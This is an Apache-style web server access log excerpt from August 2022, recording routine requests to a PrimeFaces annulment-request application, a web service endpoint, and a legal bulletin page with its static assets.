186.29.179.102 - - [11/Aug/2022:22:23:27 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/consultarSolicitudAnulacion.xhtml HTTP/1.1" 200 52730
186.29.179.102 - - [11/Aug/2022:22:23:28 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.css?ln=primefaces&v=4.0 HTTP/1.1" 200 1330
186.29.179.102 - - [11/Aug/2022:22:23:28 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:23:28 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:23:28 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:23:28 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:23:28 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.js?ln=primefaces&v=4.0 HTTP/1.1" 200 28091
186.29.179.102 - - [11/Aug/2022:22:23:40 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/registrarSolicitudAnulacion.xhtml HTTP/1.1" 200 193
186.29.179.102 - - [11/Aug/2022:22:23:40 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/registrarSolicitudAnulacion.xhtml HTTP/1.1" 200 193
186.29.179.102 - - [11/Aug/2022:22:23:40 -0500] "GET /sipse/faces/presentacion/financiero/solicitudAnulacion/consultarSolicitudAnulacion.xhtml HTTP/1.1" 200 42232
186.29.179.102 - - [11/Aug/2022:22:23:40 -0500] "GET /sipse/faces/presentacion/financiero/solicitudAnulacion/consultarSolicitudAnulacion.xhtml HTTP/1.1" 200 42232
186.29.179.102 - - [11/Aug/2022:22:23:40 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:23:40 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:23:40 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:23:40 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:23:40 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:23:40 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:23:40 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:23:41 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:23:41 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.29.179.102 - - [11/Aug/2022:22:23:41 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/consultarSolicitudAnulacion.xhtml HTTP/1.1" 200 10628
186.29.179.102 - - [11/Aug/2022:22:23:44 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/consultarSolicitudAnulacion.xhtml HTTP/1.1" 200 17019
186.29.179.102 - - [11/Aug/2022:22:23:49 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/consultarSolicitudAnulacion.xhtml HTTP/1.1" 200 911
201.245.192.253 - - [11/Aug/2022:22:23:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [11/Aug/2022:22:24:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Aug/2022:22:25:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
216.245.221.92 - - [11/Aug/2022:22:27:30 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [11/Aug/2022:22:28:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [11/Aug/2022:22:29:33 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [11/Aug/2022:22:29:33 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [11/Aug/2022:22:29:33 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [11/Aug/2022:22:29:33 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [11/Aug/2022:22:29:33 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [11/Aug/2022:22:29:33 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [11/Aug/2022:22:29:33 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [11/Aug/2022:22:29:33 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [11/Aug/2022:22:29:33 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [11/Aug/2022:22:29:33 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [11/Aug/2022:22:29:33 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [11/Aug/2022:22:29:33 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [11/Aug/2022:22:29:33 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [11/Aug/2022:22:29:33 -0500] "GET /BLA/boletinlegal/images/abajo.png HTTP/1.1" 200 96676
172.22.2.4 - - [11/Aug/2022:22:29:33 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [11/Aug/2022:22:29:33 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [11/Aug/2022:22:29:33 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [11/Aug/2022:22:29:33 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [11/Aug/2022:22:29:33 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [11/Aug/2022:22:29:33 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
